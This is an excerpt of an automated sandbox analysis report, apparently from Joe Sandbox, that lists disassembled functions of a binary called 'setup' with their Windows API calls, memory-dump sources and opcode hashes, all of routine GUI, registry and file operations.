                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageParentSend$FreeH_prolog3Task_memcpy_s
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3096905456-0
                                                                                                                          • Opcode ID: c78d2f2b11f7f7143822d7d9139d07a3db3b2a3e833c16f5a8983b37719f6c22
                                                                                                                          • Instruction ID: 23d4dae180e5cdd6ffda6dd7ab51286096eaf53540717cf3f8757358679767d3
                                                                                                                          • Opcode Fuzzy Hash: c78d2f2b11f7f7143822d7d9139d07a3db3b2a3e833c16f5a8983b37719f6c22
                                                                                                                          • Instruction Fuzzy Hash: 03618C71A10116AFCB04EFA4CC95EBEB7B8BF08714F508119F561A72E1DB30AD05DB95
                                                                                                                          Function 00C16F13 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 164COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Deallocate$H_prolog3_
                                                                                                                          • String ID: COPY
                                                                                                                          • API String ID: 2027147138-2066699830
                                                                                                                          • Opcode ID: 6c852837d01e5cdbd1b6f0974aaa584c6d63a5210cb5e1b8727abb5aeed365f0
                                                                                                                          • Instruction ID: f29259dae701def6d60076468fda360adf2375a510b477b035e2a63b57cd8724
                                                                                                                          • Opcode Fuzzy Hash: 6c852837d01e5cdbd1b6f0974aaa584c6d63a5210cb5e1b8727abb5aeed365f0
                                                                                                                          • Instruction Fuzzy Hash: 1D519B71D08248AFDF15EBFDC8415EDFBB5AF5A300F24812EE414F7292DA301A46AB52
                                                                                                                          Function 00C20E72 Relevance: 10.6, APIs: 7, Instructions: 141COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 00C20E79
                                                                                                                          • SetPixelV.GDI32(00000003,?,?,?,00000020,00C20DF3,?,00000000,00000000), ref: 00C20EF9
                                                                                                                          • SetPixelV.GDI32(00000003,?,?,?), ref: 00C20F09
                                                                                                                          • SetPixelV.GDI32(00000003,?,?,?), ref: 00C20F1C
                                                                                                                          • Ellipse.GDI32(00000001,?,?,?,?), ref: 00C20F79
                                                                                                                          • Ellipse.GDI32(00000001,?,?,?,?), ref: 00C20F92
                                                                                                                          • Ellipse.GDI32(00000001,?,?,?,?), ref: 00C20FAE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: EllipsePixel$H_prolog3
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2528679965-0
                                                                                                                          • Opcode ID: 860dcee1909a40ea79fb8050d3c6a130af764175b519d422cb5dd5d360aa1bcf
                                                                                                                          • Instruction ID: e7e0c40bcec5f624aa0a726882213f3d5e01c4aa539833284b6242cca7b76afb
                                                                                                                          • Opcode Fuzzy Hash: 860dcee1909a40ea79fb8050d3c6a130af764175b519d422cb5dd5d360aa1bcf
                                                                                                                          • Instruction Fuzzy Hash: A7512B71A0011AAFCF04DFA8CD96AEEBBB5FF48300F148119F915A7291DB71A914DBA4
                                                                                                                          Function 00C32938 Relevance: 10.6, APIs: 7, Instructions: 135windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetParent.USER32(?), ref: 00C32965
                                                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00C32987
                                                                                                                          • UpdateWindow.USER32(?), ref: 00C329A1
                                                                                                                          • SendMessageW.USER32(?,00000121,00000001,?), ref: 00C329C7
                                                                                                                          • SendMessageW.USER32(?,0000036A,00000000,00000000), ref: 00C329DF
                                                                                                                          • UpdateWindow.USER32(?), ref: 00C32A2C
                                                                                                                            • Part of subcall function 00C351FB: GetWindowLongW.USER32(0000001C,000000F0), ref: 00C35208
                                                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00C32A76
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Message$Window$PeekSendUpdate$LongParent
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2853195852-0
                                                                                                                          • Opcode ID: eb07daf39b0217df434b611e43ef63430435a50365d33b5fa82bd44c40697dae
                                                                                                                          • Instruction ID: 7578a9242963d482e66d0effbfd4da16d9d6dd02a3f086de0479d9bab8bfd2c8
                                                                                                                          • Opcode Fuzzy Hash: eb07daf39b0217df434b611e43ef63430435a50365d33b5fa82bd44c40697dae
                                                                                                                          • Instruction Fuzzy Hash: 6B417A71A20315BFEF249BA4C849B6EBBB8FF04755F148159E861E7190DB70DE109BA0
                                                                                                                          Function 00C3B4B1 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 130registryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C3B4BB
                                                                                                                          • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?), ref: 00C3B5C0
                                                                                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000104), ref: 00C3B5DD
                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00C3B5FE
                                                                                                                          • RegQueryValueW.ADVAPI32(80000001,?,?,?), ref: 00C3B619
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseEnumH_prolog3_OpenQueryValue
                                                                                                                          • String ID: Software\
                                                                                                                          • API String ID: 1666054129-964853688
                                                                                                                          • Opcode ID: 5026c3837d571af8ca92634e68676cb2d19fe2eef7e48ba5b53a1b330beec897
                                                                                                                          • Instruction ID: 7624ab742a5d3eb6e1c79b0f1dff99d62ef53a1ec7c102939d96886dae411366
                                                                                                                          • Opcode Fuzzy Hash: 5026c3837d571af8ca92634e68676cb2d19fe2eef7e48ba5b53a1b330beec897
                                                                                                                          • Instruction Fuzzy Hash: 55417F7190122AABCB20EBA0DC99FEEB77CAF04314F1441A9F505A3192DB309F85DF50
                                                                                                                          Function 00C1193F Relevance: 10.6, APIs: 7, Instructions: 127windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C11949
                                                                                                                            • Part of subcall function 00C2CFF3: __EH_prolog3.LIBCMT ref: 00C2CFFA
                                                                                                                            • Part of subcall function 00C2CFF3: BeginPaint.USER32(?,?,00000004,00C389E0,?,00000058,00C1C274), ref: 00C2D026
                                                                                                                          • GetClientRect.USER32(?,?), ref: 00C1199E
                                                                                                                            • Part of subcall function 00C2E424: SetBkColor.GDI32(00000000,?), ref: 00C2E440
                                                                                                                            • Part of subcall function 00C2E424: ExtTextOutW.GDI32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000), ref: 00C2E455
                                                                                                                          • GetClientRect.USER32(?,?), ref: 00C119E8
                                                                                                                          • CreateCompatibleDC.GDI32(?), ref: 00C11A00
                                                                                                                          • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00C11A51
                                                                                                                          • GetClientRect.USER32(?,?), ref: 00C11AAD
                                                                                                                          • PostMessageW.USER32(?,00000000,00000000), ref: 00C11AFF
                                                                                                                            • Part of subcall function 00C0F90F: __EH_prolog3.LIBCMT ref: 00C0F916
                                                                                                                            • Part of subcall function 00C0F90F: CreateCompatibleDC.GDI32(00000001), ref: 00C0F96F
                                                                                                                            • Part of subcall function 00C0F90F: CreateCompatibleBitmap.GDI32(00000001,?,?), ref: 00C0F98D
                                                                                                                            • Part of subcall function 00C0F90F: GetBkColor.GDI32(?), ref: 00C0F9C5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ClientCompatibleCreateRect$ColorH_prolog3$BeginBitmapH_prolog3_MessagePaintPostText
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 800765946-0
                                                                                                                          • Opcode ID: 5598937d0b0cd1794fd0dcee345c17c63e04a33f5c6b28efd70d714b119e56ce
                                                                                                                          • Instruction ID: ad7449bee3a99c1cdfe1d8bd61f1b4bf649fbb853ad8659abe557bdeae6ef6af
                                                                                                                          • Opcode Fuzzy Hash: 5598937d0b0cd1794fd0dcee345c17c63e04a33f5c6b28efd70d714b119e56ce
                                                                                                                          • Instruction Fuzzy Hash: 2B515F7090126DAFDF21DBA0CD44FEEBBB9BF16304F048199F58A62151DB346E84EB21
                                                                                                                          Function 00C2E63F Relevance: 10.6, APIs: 7, Instructions: 122windowthreadCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00C2E594: GetParent.USER32(00000000), ref: 00C2E5F1
                                                                                                                            • Part of subcall function 00C2E594: GetLastActivePopup.USER32(00000000), ref: 00C2E604
                                                                                                                            • Part of subcall function 00C2E594: IsWindowEnabled.USER32(00000000), ref: 00C2E618
                                                                                                                            • Part of subcall function 00C2E594: EnableWindow.USER32(00000000,00000000), ref: 00C2E62B
                                                                                                                          • EnableWindow.USER32(?,00000001), ref: 00C2E68A
                                                                                                                          • GetWindowThreadProcessId.USER32(?,?), ref: 00C2E6A0
                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 00C2E6AA
                                                                                                                          • SendMessageW.USER32(?,00000376,00000000,00000000), ref: 00C2E6C0
                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00C2E74B
                                                                                                                          • MessageBoxW.USER32(?,?,?,00C1B1CF), ref: 00C2E76D
                                                                                                                          • EnableWindow.USER32(00000000,00000001), ref: 00C2E792
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$Enable$MessageProcess$ActiveCurrentEnabledFileLastModuleNameParentPopupSendThread
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1924968399-0
                                                                                                                          • Opcode ID: 3936a7820b90e5d35e1c6d0616c4fe12d0a42bbf34d51a4bb444a3a231937d2e
                                                                                                                          • Instruction ID: 4c5fb2c35d19d17cf2281839f538a92107c5901211e89ac0a869cb8d302224a1
                                                                                                                          • Opcode Fuzzy Hash: 3936a7820b90e5d35e1c6d0616c4fe12d0a42bbf34d51a4bb444a3a231937d2e
                                                                                                                          • Instruction Fuzzy Hash: BB418E75A4022D9FDB20DF68EC88BA9B7B8FB14744F1005A9F519F7680DB719E80CB61
                                                                                                                          Function 00C12917 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 111processCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000005), ref: 00C1294E
                                                                                                                            • Part of subcall function 00C12A5F: RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00000001,?,00000000), ref: 00C12A8B
                                                                                                                            • Part of subcall function 00C12A5F: RegQueryValueW.ADVAPI32(?,00000000,?,?), ref: 00C12AB6
                                                                                                                            • Part of subcall function 00C12A5F: RegCloseKey.ADVAPI32(?), ref: 00C12AD1
                                                                                                                          • WinExec.KERNEL32(00000000,00000005), ref: 00C12A37
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseExecExecuteOpenQueryShellValue
                                                                                                                          • String ID: "%1"$.htm$\shell\open\command$open
                                                                                                                          • API String ID: 2057079084-1533145997
                                                                                                                          • Opcode ID: d9aa4119052fd40f68972901257da5ba84f2e10a8a86ca094c232644d78583e5
                                                                                                                          • Instruction ID: 83bfa196bbd0cecec1a7a3418cfb170fc1d5303866e652ba84e61b47a1dea5a6
                                                                                                                          • Opcode Fuzzy Hash: d9aa4119052fd40f68972901257da5ba84f2e10a8a86ca094c232644d78583e5
                                                                                                                          • Instruction Fuzzy Hash: B6310976500219AADB30E7749C86EEF33ACEF46710F100065F604E7092EA30DE85B671
                                                                                                                          Function 00C20416 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 107COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetFileVersionInfoSizeW.VERSION(?,?,00000410,00000000), ref: 00C20432
                                                                                                                          • GetFileVersionInfoW.VERSION(?,?,00000000,?,?,?,?,?), ref: 00C20464
                                                                                                                          • VerQueryValueW.VERSION(?,00CB038C,00000000,?,?,?,?), ref: 00C2048F
                                                                                                                            • Part of subcall function 00C20554: VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,00000000), ref: 00C205A1
                                                                                                                            • Part of subcall function 00C20554: wsprintfW.USER32 ref: 00C205C7
                                                                                                                            • Part of subcall function 00C20554: VerQueryValueW.VERSION(?,?,?,?), ref: 00C205E7
                                                                                                                            • Part of subcall function 00C20554: lstrcpyW.KERNEL32(00C20519,?), ref: 00C205F8
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: QueryValue$FileInfoVersion$Sizelstrcpywsprintf
                                                                                                                          • String ID: CompanyName$FileDescription$ProductName
                                                                                                                          • API String ID: 3048008207-1224206804
                                                                                                                          • Opcode ID: 6e6ed49a39a624b9e395fa3e5beb12e10a7be01b68bb5133424dbeabad52cd31
                                                                                                                          • Instruction ID: 1a42cd3ba824f7b306042010f5861c910ecd3af8ed2846ec0c3d1b09995ad99e
                                                                                                                          • Opcode Fuzzy Hash: 6e6ed49a39a624b9e395fa3e5beb12e10a7be01b68bb5133424dbeabad52cd31
                                                                                                                          • Instruction Fuzzy Hash: B7416571A1020AEBC704DFA5DC45AEEB7B8FF08300F10012AE419E3651EB30EA54DFA5
                                                                                                                          Function 00C3B264 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 102registryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 00C3B26E
                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,00000010,00000000,0002001F,?,00000228), ref: 00C3B314
                                                                                                                            • Part of subcall function 00C3B201: __EH_prolog3.LIBCMT ref: 00C3B208
                                                                                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000104), ref: 00C3B338
                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00C3B3ED
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseEnumH_prolog3H_prolog3_catch_Open
                                                                                                                          • String ID: Software\Classes\
                                                                                                                          • API String ID: 854624316-1121929649
                                                                                                                          • Opcode ID: c665e41997da9af177dc7e564d484d757c42c07caede77851f286ad62071dfb9
                                                                                                                          • Instruction ID: 10d229177a3c96bef60669afc0cd6247b72324e6b00a390962ef725ffed914e1
                                                                                                                          • Opcode Fuzzy Hash: c665e41997da9af177dc7e564d484d757c42c07caede77851f286ad62071dfb9
                                                                                                                          • Instruction Fuzzy Hash: 5E41B572910219EBCF21EBA4DC88BEDB7B8AF44310F1041DAE515A72A1CF709F48DE21
                                                                                                                          Function 00C31981 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 101libraryloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleW.KERNEL32(user32.dll), ref: 00C319AC
                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetTouchInputInfo), ref: 00C319E1
                                                                                                                          • GetProcAddress.KERNEL32(00000000,CloseTouchInputHandle), ref: 00C31A09
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                          • String ID: CloseTouchInputHandle$GetTouchInputInfo$user32.dll
                                                                                                                          • API String ID: 667068680-1853737257
                                                                                                                          • Opcode ID: 0451515a3d8706aeb985f30e34465721b0663159932a1bd56cbb822b51048596
                                                                                                                          • Instruction ID: 111f2cc6939c2c5d2e00681ff0292dbed2c9bc763ede4b607e7040efe9bf826a
                                                                                                                          • Opcode Fuzzy Hash: 0451515a3d8706aeb985f30e34465721b0663159932a1bd56cbb822b51048596
                                                                                                                          • Instruction Fuzzy Hash: 65318130611316AFCB149F69FC49F6D7BF9EB48761B14842AF825D32E0DB709E409A50
                                                                                                                          Function 00C23C4E Relevance: 10.6, APIs: 7, Instructions: 89fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C23C71
                                                                                                                          • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C23C91
                                                                                                                          • CloseHandle.KERNEL32(00000000,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C23C9C
                                                                                                                          • ReadFile.KERNEL32(00000000,00000000,00008000,00000000,00000000), ref: 00C23CD7
                                                                                                                          • WriteFile.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 00C23CF3
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00C23D0F
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00C23D14
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$CloseHandle$Create$ReadWrite
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2500732950-0
                                                                                                                          • Opcode ID: f30aa08203e40a1d92f25c143d00a313c45e77b58284ccf3be7e18f14c0062db
                                                                                                                          • Instruction ID: d619c7d783c80ffd6587bb20fb87bdeddc5143eececfde3486405a3ec0881aca
                                                                                                                          • Opcode Fuzzy Hash: f30aa08203e40a1d92f25c143d00a313c45e77b58284ccf3be7e18f14c0062db
                                                                                                                          • Instruction Fuzzy Hash: B9218071A50224BEEB206B75AC49FBF7AACEF41B64F204115F910E21D0DB749F059A60
                                                                                                                          Function 00C17D94 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 83fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C17D9B
                                                                                                                          • _strlen.LIBCMT ref: 00C17DBE
                                                                                                                          • GetFileAttributesW.KERNEL32(?,00000000,00000020,00C17114,?), ref: 00C17E07
                                                                                                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00C17E28
                                                                                                                          • DeleteFileW.KERNEL32(?), ref: 00C17E5C
                                                                                                                          Strings
